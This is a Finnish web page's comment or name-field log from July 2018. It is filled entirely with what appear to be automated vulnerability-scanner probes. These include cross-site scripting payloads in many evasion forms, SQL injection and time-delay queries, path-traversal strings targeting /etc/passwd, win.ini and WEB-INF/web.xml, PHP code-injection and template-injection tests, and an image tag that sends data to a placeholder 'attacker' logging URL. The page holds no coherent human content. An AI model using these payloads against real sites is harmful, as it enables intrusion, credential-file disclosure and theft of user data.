29.07.2018, 09:12

e

Nimi: e

";print(md5(acunetix_wvs_security_test));$a="

29.07.2018, 09:12

e

Nimi: WEB-INF/web.xml

1

29.07.2018, 09:12

e

Nimi: e

';print(md5(acunetix_wvs_security_test));$a='

29.07.2018, 09:12

e

Nimi: e

;print(md5(acunetix_wvs_security_test));

29.07.2018, 09:12

e

Nimi: '"()

1

29.07.2018, 09:12

e

Nimi: WEB-INF\web.xml

1

29.07.2018, 09:12

e

Nimi: ../../../../../../../../../../windows/win.ini

1

29.07.2018, 09:12

e

Nimi: e

${@print(md5(acunetix_wvs_security_test))}\

29.07.2018, 09:12

Nimi: e

1

29.07.2018, 09:12

'"()

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

${@print(md5(acunetix_wvs_security_test))}

29.07.2018, 09:12

e

Nimi: http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

29.07.2018, 09:12

e

Nimi: e

menestystarina-hallitusohjelmien-osaksi.html

29.07.2018, 09:12

e

Nimi: ../../../../../../../../../../windows/win.ini.jpg

1

29.07.2018, 09:12

e

Nimi: ;print(md5(acunetix_wvs_security_test));

1

29.07.2018, 09:12

e

Nimi: ';print(md5(acunetix_wvs_security_test));$a='

1

29.07.2018, 09:12

e

Nimi: ";print(md5(acunetix_wvs_security_test));$a="

1

29.07.2018, 09:12

e

Nimi: ../../../../../../../../../../boot.ini

1

29.07.2018, 09:12

e

Nimi: e

http://testasp.vulnweb.com/t/xss.html?%00.jpg

29.07.2018, 09:12

http://testasp.vulnweb.com/t/xss.html?%00.jpg

Nimi: e

1

29.07.2018, 09:12

e

Nimi: ${@print(md5(acunetix_wvs_security_test))}\

1

29.07.2018, 09:12

e

Nimi: ${@print(md5(acunetix_wvs_security_test))}

1

29.07.2018, 09:12

e

Nimi: e

http://hit3uc40IJfYD.bxss.me/

29.07.2018, 09:12

e

Nimi: ................windowswin.ini

1

29.07.2018, 09:12

e

Nimi: e

menestystarina-hallitusohjelmien-osaksi.html/.

29.07.2018, 09:12

e

Nimi: menestystarina-hallitusohjelmien-osaksi.html

1

29.07.2018, 09:12

e

Nimi: menestystarina-hallitusohjelmien-osaksi.html/.

1

29.07.2018, 09:12

e

Nimi: /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

29.07.2018, 09:12

e

Nimi: http://hitNCketQ4kFu.bxss.me/

1

29.07.2018, 09:12

e

Nimi: e

1'"

29.07.2018, 09:12

e

Nimi: ..\..\..\..\..\..\..\..\windows\win.ini

1

29.07.2018, 09:12

e

Nimi: e

\

29.07.2018, 09:12

e

Nimi: e

@@Qlfux

29.07.2018, 09:12

menestystarina-hallitusohjelmien-osaksi.html

Nimi: e

1

29.07.2018, 09:12

e

Nimi: ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

29.07.2018, 09:12

e

Nimi: ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

29.07.2018, 09:12

http://hitNrLp80iZCz.bxss.me/

Nimi: e

1

29.07.2018, 09:12

e

Nimi: )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

29.07.2018, 09:12

e

Nimi: unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1

29.07.2018, 09:12

;print(md5(acunetix_wvs_security_test));

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

JyI=

29.07.2018, 09:12

e

Nimi: e

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

29.07.2018, 09:12

';print(md5(acunetix_wvs_security_test));$a='

Nimi: e

1

29.07.2018, 09:12

menestystarina-hallitusohjelmien-osaksi.html/.

Nimi: e

1

29.07.2018, 09:12

e

Nimi: 1'"

1

29.07.2018, 09:12

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

(select convert(int,CHAR(65)))

29.07.2018, 09:12

";print(md5(acunetix_wvs_security_test));$a="

Nimi: e

1

29.07.2018, 09:12

${@print(md5(acunetix_wvs_security_test))}

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

908902

29.07.2018, 09:12

e

Nimi: e

/www.vulnweb.com

29.07.2018, 09:12

e

Nimi: \

1

29.07.2018, 09:12

e

Nimi: e

<!--

29.07.2018, 09:12

e

Nimi: e

http://www.vulnweb.com

29.07.2018, 09:12

${@print(md5(acunetix_wvs_security_test))}\

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

'"

29.07.2018, 09:12

e

Nimi: e

1'"()&%<acx><ScRiPt >H6Sf(9807)</ScRiPt>

29.07.2018, 09:12

e

Nimi: e

//www.vulnweb.com

29.07.2018, 09:12

e

Nimi: e

1_9755

29.07.2018, 09:12

e

Nimi: '"

1

29.07.2018, 09:12

e

Nimi: e

'"()&%<acx><ScRiPt >H6Sf(9569)</ScRiPt>

29.07.2018, 09:12

e

Nimi: @@cyrmM

1

29.07.2018, 09:12

e

Nimi: e

/\www.vulnweb.com

29.07.2018, 09:12

e

Nimi: JyI=

1

29.07.2018, 09:12

e

Nimi: /www.vulnweb.com

1

29.07.2018, 09:12

e

Nimi: e

acu5490<s1﹥s2ʺs3ʹuca5490

29.07.2018, 09:12

'"

Nimi: e

1

29.07.2018, 09:12

e

Nimi: 955445

1

29.07.2018, 09:12

e

Nimi: (select convert(int,CHAR(65)))

1

29.07.2018, 09:12

e

Nimi: http://www.vulnweb.com

1

29.07.2018, 09:12

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

{{10000492*9999538}}

29.07.2018, 09:12

e

Nimi: //www.vulnweb.com

1

29.07.2018, 09:12

e

Nimi: /\www.vulnweb.com

1

29.07.2018, 09:12

e

Nimi: e

1<ScRiPt >H6Sf(9648)</ScRiPt>

29.07.2018, 09:12

e

Nimi: e

1<WWZUZL>P04MX[!+!]</WWZUZL>

29.07.2018, 09:12

e

Nimi: e

1<ScR<ScRiPt>IpT>H6Sf(9529)</sCr<ScRiPt>IpT>

29.07.2018, 09:12

e

Nimi: e

1<script>H6Sf(9884)</script>

29.07.2018, 09:12

e

Nimi: e

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9340></ScRiPt>

29.07.2018, 09:12

e

Nimi: e

1<ScRiPt
>H6Sf(9310)</ScRiPt>

29.07.2018, 09:12

1'"

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

1<video><source onerror="javascript:H6Sf(9177)">

29.07.2018, 09:12

936707

Nimi: e

1

29.07.2018, 09:12

\

Nimi: e

1

29.07.2018, 09:12

/www.vulnweb.com

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9805'>

29.07.2018, 09:12

@@IyFaD

Nimi: e

1

29.07.2018, 09:12

//www.vulnweb.com

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

1<isindex type=image src=1 onerror=H6Sf(9804)>

29.07.2018, 09:12

http://www.vulnweb.com

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

1<body onload=H6Sf(9065)>

29.07.2018, 09:12

JyI=

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

1<img src=//testasp.vulnweb.com/t/dot.gif onload=H6Sf(9811)>

29.07.2018, 09:12

/\www.vulnweb.com

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

1<img/src=">" onerror=alert(9108)>

29.07.2018, 09:12

e

Nimi: e

1<img src=xyz OnErRor=H6Sf(9235)>

29.07.2018, 09:12

(select convert(int,CHAR(65)))

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

1\u003CScRiPt\H6Sf(9951)\u003C/sCripT\u003E

29.07.2018, 09:12

e

Nimi: e

%31%3C%53%63%52%69%50%74%20%3E%48%36%53%66%289548%29%3C%2F%73%43%72%69%70%54%3E

29.07.2018, 09:12

e

Nimi: e

1&lt;ScRiPt&gt;H6Sf(9260)&lt;/sCripT&gt;

29.07.2018, 09:12

e

Nimi: e

1<input autofocus onfocus=H6Sf(9541)>

29.07.2018, 09:12

e

Nimi: e

<a HrEF=http://www.vulnweb.com></a>

29.07.2018, 09:12

e

Nimi: e

<a HrEF=jaVaScRiPT:>

29.07.2018, 09:12

-1 OR 2+75-75-1=0+0+0+1 --

Nimi: e

1

29.07.2018, 09:12

-1 OR 3+75-75-1=0+0+0+1 --

Nimi: e

1

29.07.2018, 09:13

e

Nimi: e

[url=http://www.vulnweb.com][/url]

29.07.2018, 09:13

e

Nimi: e

1<img<!-- --> src=x onerror=alert(9475);//><!-- -->

29.07.2018, 09:13

-1 OR 3*2

Nimi: e

1

29.07.2018, 09:13

e

Nimi: e

1}body{acu:Expre/**/SSion(H6Sf(9627))}

29.07.2018, 09:13

e

Nimi: e

1<% contenteditable onresize=H6Sf(9573)>

29.07.2018, 09:13

-1 OR 3*2>(0+5+75-75) --

Nimi: e

1

29.07.2018, 09:13

e

Nimi: e

1_yxRjQ
<ScRiPt >H6Sf(9911)</ScRiPt>

29.07.2018, 09:13

-1 OR 3+791-791-1=0+0+0+1

Nimi: e

1

29.07.2018, 09:13

-1 OR 2+791-791-1=0+0+0+1

Nimi: e

1

29.07.2018, 09:13

e

Nimi: e

1<WKDAJJ>1YBQS[!+!]</WKDAJJ>

29.07.2018, 09:13

e

Nimi: e

1<ifRAme sRc=9819.com></IfRamE>

29.07.2018, 09:13

e

Nimi: e

1<img sRc='http://attacker-9673/log.php?

29.07.2018, 09:13

-1 OR 3*2>(0+5+791-791)

Nimi: e

1

29.07.2018, 09:13

e

Nimi: e

1<5YLLkL x=9549>

29.07.2018, 09:13

-1' OR 2+304-304-1=0+0+0+1 --

Nimi: e

1

29.07.2018, 09:13

e

Nimi: e'"()&%H6Sf(9032)

1

29.07.2018, 09:13

e

Nimi: e_9522

1

29.07.2018, 09:13

e

Nimi: '"()&%H6Sf(9354)

1

29.07.2018, 09:13

-1' OR 3+304-304-1=0+0+0+1 --

Nimi: e

1

29.07.2018, 09:13

../../../../../../../../../../etc/passwd

Nimi: e

1

29.07.2018, 09:13

../../../../../../../../../../../../../../../proc/version

Nimi: e

1

29.07.2018, 09:13

-1' OR 3*2

Nimi: e

1

29.07.2018, 09:13

../../../../../../../../../../etc/passwd.jpg

Nimi: e

1

29.07.2018, 09:13

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Nimi: e

1

29.07.2018, 09:13

-1' OR 3*2>(0+5+304-304) --

Nimi: e

1

29.07.2018, 09:13

e

Nimi: acu9053<s1﹥s2ʺs3ʹuca9053

1

29.07.2018, 09:13

e

Nimi: {{10000301*9999422}}

1

29.07.2018, 09:13

-1' OR 2+296-296-1=0+0+0+1 or 'TMP3kdiY'='

Nimi: e

1

29.07.2018, 09:13

e

Nimi: eH6Sf(9682)

1

29.07.2018, 09:13

/../..//../..//../..//../..//../..//etc/passwd.jpg

Nimi: e

1

29.07.2018, 09:13

-1' OR 3+296-296-1=0+0+0+1 or 'TMP3kdiY'='

Nimi: e

1

29.07.2018, 09:13

e

Nimi: eH6Sf(9702)

1

29.07.2018, 09:13

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Nimi: e

1

29.07.2018, 09:13

e

Nimi: eTQT5K[!+!]

1

29.07.2018, 09:13

/etc/passwd

Nimi: e

1

29.07.2018, 09:13

e

Nimi: eH6Sf(9651)

1

29.07.2018, 09:13

-1' OR 3*2>(0+5+296-296) or 'TMP3kdiY'='

Nimi: e

1

29.07.2018, 09:13

-1" OR 2+761-761-1=0+0+0+1 --

Nimi: e

1

29.07.2018, 09:13

%2fetc%2fpasswd

Nimi: e

1

29.07.2018, 09:13

/.././.././.././.././.././.././.././../etc/./passwd%00

Nimi: e

1

29.07.2018, 09:13

e

Nimi: eH6Sf(9868)

1

29.07.2018, 09:13

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

Nimi: e

1

29.07.2018, 09:13

e

Nimi: eH6Sf(9341)

1

29.07.2018, 09:13

-1" OR 3+761-761-1=0+0+0+1 --

Nimi: e

1

29.07.2018, 09:13

-1" OR 3*2

Nimi: e

1

29.07.2018, 09:13

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

Nimi: e

1

29.07.2018, 09:13

-1" OR 3*2>(0+5+761-761) --

Nimi: e

1

29.07.2018, 09:13

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

Nimi: e

1

29.07.2018, 09:13

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

Nimi: e

1

29.07.2018, 09:13

file:///etc/passwd

Nimi: e

1

29.07.2018, 09:13

1 waitfor delay '0:0:9' --

Nimi: e

1

29.07.2018, 09:13

/\../\../\../\../\../\../\../etc/passwd

Nimi: e

1

29.07.2018, 09:13

uxcJ3kLL'; waitfor delay '0:0:9' --

Nimi: e

1

29.07.2018, 09:13

z4fMl6gW';select pg_sleep(9); --

Nimi: e

1

29.07.2018, 09:13

WEB-INF/web.xml

Nimi: e

1

29.07.2018, 09:13

Off18wBc');select pg_sleep(9); --

Nimi: e

1

29.07.2018, 09:13

/WEB-INF/web.xml

Nimi: e

1

29.07.2018, 09:13

e

Nimi: %65%3C%53%63%52%69%50%74%20%3E%48%36%53%66%289988%29%3C%2F%73%43%72%69%70%54%3E

1

29.07.2018, 09:13

2caP6A1o'));select pg_sleep(9); --

Nimi: e

1

29.07.2018, 09:13

WEB-INF\web.xml

Nimi: e

1

29.07.2018, 09:13

e

Nimi: e\u003CScRiPt\H6Sf(9281)\u003C/sCripT\u003E

1

29.07.2018, 09:13

e

Nimi: e&lt;ScRiPt&gt;H6Sf(9023)&lt;/sCripT&gt;

1

29.07.2018, 09:13

../../../../../../../../../../windows/win.ini

Nimi: e

1

29.07.2018, 09:13

../../../../../../../../../../boot.ini

Nimi: e

1

29.07.2018, 09:13

../../../../../../../../../../windows/win.ini.jpg

Nimi: e

1

29.07.2018, 09:13

e

Nimi: [url=http://www.vulnweb.com][/url]

1

29.07.2018, 09:13

................windowswin.ini

Nimi: e

1

29.07.2018, 09:13

e

Nimi: e}body{acu:Expre/**/SSion(H6Sf(9554))}

1

29.07.2018, 09:13

..\..\..\..\..\..\..\..\windows\win.ini

Nimi: e

1

29.07.2018, 09:13

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

Nimi: e

1

29.07.2018, 09:13

e

Nimi: e_5Atx5 H6Sf(9158)

1

29.07.2018, 09:13

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

Nimi: e

1

29.07.2018, 09:13

e

Nimi: eCSE9C[!+!]

1

29.07.2018, 09:13

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Nimi: e

1

29.07.2018, 09:13

e'"()&%H6Sf(9562)

Nimi: e

1

29.07.2018, 09:13

'"()&%H6Sf(9153)

Nimi: e

1

29.07.2018, 09:13

e_9068

Nimi: e

1

29.07.2018, 09:13

acu4581<s1﹥s2ʺs3ʹuca4581

Nimi: e

1

29.07.2018, 09:13

{{10000222*9999939}}

Nimi: e

1

29.07.2018, 09:13

acu10927<s1﹥s2ʺs3ʹuca10927

Nimi: e

1

29.07.2018, 09:13

{{10000361*10000155}}

Nimi: e

1

29.07.2018, 09:13

e" onmouseover=H6Sf(9604) bad="

Nimi: e

1

29.07.2018, 09:13

e" vF27=H6Sf([!+!]) gX7="

Nimi: e

1

29.07.2018, 09:13

%65%22%20%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%48%36%53%66%28%39%36%39%36%29%20%62%61%64%3D%22

Nimi: e

1

29.07.2018, 09:13

e\u0022 onmouseover=H6Sf(9618) bad=\u0022

Nimi: e

1

29.07.2018, 09:13

e"sTYLe='acu:Expre/**/SSion(H6Sf(9883))'bad="

Nimi: e

1

29.07.2018, 09:13

e">H6Sf(9630)

Nimi: e

1

29.07.2018, 09:13

eH6Sf(9491)

Nimi: e

1

29.07.2018, 09:13

e9DXIK[!+!]

Nimi: e

1

29.07.2018, 09:13

eH6Sf(9837)

Nimi: e

1

29.07.2018, 09:13

eH6Sf(9173)

Nimi: e

1

29.07.2018, 09:13

eH6Sf(9640)

Nimi: e

1

29.07.2018, 09:13

eH6Sf(9022)

Nimi: e

1

29.07.2018, 09:13

%65%3C%53%63%52%69%50%74%20%3E%48%36%53%66%289900%29%3C%2F%73%43%72%69%70%54%3E

Nimi: e

1

29.07.2018, 09:14

e\u003CScRiPt\H6Sf(9247)\u003C/sCripT\u003E

Nimi: e

1

29.07.2018, 09:14

e&lt;ScRiPt&gt;H6Sf(9514)&lt;/sCripT&gt;

Nimi: e

1

29.07.2018, 09:14

[url=http://www.vulnweb.com][/url]

Nimi: e

1

29.07.2018, 09:14

e}body{acu:Expre/**/SSion(H6Sf(9208))}

Nimi: e

1

29.07.2018, 09:14

e_LvR7F H6Sf(9906)

Nimi: e

1

29.07.2018, 09:14

eSJ9HC[!+!]

Nimi: e

1

29.07.2018, 09:14

e

Nimi: e

1acu4WB6T99TKv

29.07.2018, 18:24

e

Nimi: 1acu5620HECHI2

1

29.07.2018, 18:24

1acuimfHghqw5r

Nimi: e

1

29.07.2018, 18:24

e

Nimi: e

1'"()&%<acx><ScRiPt >V7SM(9484)</ScRiPt>

29.07.2018, 18:48

e

Nimi: e

'"()&%<acx><ScRiPt >V7SM(9426)</ScRiPt>

29.07.2018, 18:48

e

Nimi: e

1_9842

29.07.2018, 18:48

e

Nimi: e

acu5333<s1﹥s2ʺs3ʹuca5333

29.07.2018, 18:48

e

Nimi: e

{{9999821*9999781}}

29.07.2018, 18:48

e

Nimi: e

1<ScRiPt >V7SM(9930)</ScRiPt>

29.07.2018, 18:48

e

Nimi: e

1<WT9NJN>OQH92[!+!]</WT9NJN>

29.07.2018, 18:48

e

Nimi: e

1<script>V7SM(9671)</script>

29.07.2018, 18:48

e

Nimi: e

1<ScR<ScRiPt>IpT>V7SM(9914)</sCr<ScRiPt>IpT>

29.07.2018, 18:48

e

Nimi: e

1<ScRiPt
>V7SM(9956)</ScRiPt>

29.07.2018, 18:48

e

Nimi: e

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9076></ScRiPt>

29.07.2018, 18:48

e

Nimi: e

1<video><source onerror="javascript:V7SM(9814)">

29.07.2018, 18:48

e

Nimi: e

1<isindex type=image src=1 onerror=V7SM(9956)>

29.07.2018, 18:48

e

Nimi: e

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9621'>

29.07.2018, 18:48

e

Nimi: e

1<body onload=V7SM(9773)>

29.07.2018, 18:48

e

Nimi: e

1<img src=//testasp.vulnweb.com/t/dot.gif onload=V7SM(9855)>

29.07.2018, 18:48

e

Nimi: e

1<img src=xyz OnErRor=V7SM(9890)>

29.07.2018, 18:48

e

Nimi: e

1<img/src=">" onerror=alert(9584)>

29.07.2018, 18:48

e

Nimi: e

%31%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289818%29%3C%2F%73%43%72%69%70%54%3E

29.07.2018, 18:48

e

Nimi: e

1\u003CScRiPt\V7SM(9033)\u003C/sCripT\u003E

29.07.2018, 18:48

e

Nimi: e

1&lt;ScRiPt&gt;V7SM(9567)&lt;/sCripT&gt;

29.07.2018, 18:48

e

Nimi: e

1<input autofocus onfocus=V7SM(9546)>

29.07.2018, 18:49

e

Nimi: e

1<img<!-- --> src=x onerror=alert(9220);//><!-- -->

29.07.2018, 18:49

e

Nimi: e

1}body{acu:Expre/**/SSion(V7SM(9825))}

29.07.2018, 18:49

e

Nimi: e

1<% contenteditable onresize=V7SM(9882)>

29.07.2018, 18:49

e

Nimi: e

1_zg0LX
<ScRiPt >V7SM(9345)</ScRiPt>

29.07.2018, 18:49

e

Nimi: e

1<WS3302>P7UAQ[!+!]</WS3302>

29.07.2018, 18:49

e

Nimi: e

1<ifRAme sRc=9169.com></IfRamE>

29.07.2018, 18:49

e

Nimi: e

1<svQj2E x=9426>

29.07.2018, 18:49

e

Nimi: e

1<img sRc='http://attacker-9128/log.php?

29.07.2018, 18:49

e

Nimi: e'"()&%V7SM(9702)

1

29.07.2018, 18:49

e

Nimi: '"()&%V7SM(9172)

1

29.07.2018, 18:49

e

Nimi: e_9981

1

29.07.2018, 18:49

e

Nimi: acu1543<s1﹥s2ʺs3ʹuca1543

1

29.07.2018, 18:49

e

Nimi: {{10000206*9999830}}

1

29.07.2018, 18:49

e

Nimi: eV7SM(9744)

1

29.07.2018, 18:49

e

Nimi: eVCEHC[!+!]

1

29.07.2018, 18:49

e

Nimi: eV7SM(9700)

1

29.07.2018, 18:49

e

Nimi: eV7SM(9183)

1

29.07.2018, 18:49

e

Nimi: eV7SM(9778)

1

29.07.2018, 18:49

e

Nimi: eV7SM(9633)

1

29.07.2018, 18:49

e

Nimi: %65%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289657%29%3C%2F%73%43%72%69%70%54%3E

1

29.07.2018, 18:49

e

Nimi: e\u003CScRiPt\V7SM(9341)\u003C/sCripT\u003E

1

29.07.2018, 18:50

e

Nimi: e&lt;ScRiPt&gt;V7SM(9518)&lt;/sCripT&gt;

1

29.07.2018, 18:50

e

Nimi: e}body{acu:Expre/**/SSion(V7SM(9713))}

1

29.07.2018, 18:50

e

Nimi: e_BzaYj V7SM(9618)

1

29.07.2018, 18:50

e

Nimi: eB70BW[!+!]

1

29.07.2018, 18:50

e'"()&%V7SM(9342)

Nimi: e

1

29.07.2018, 18:50

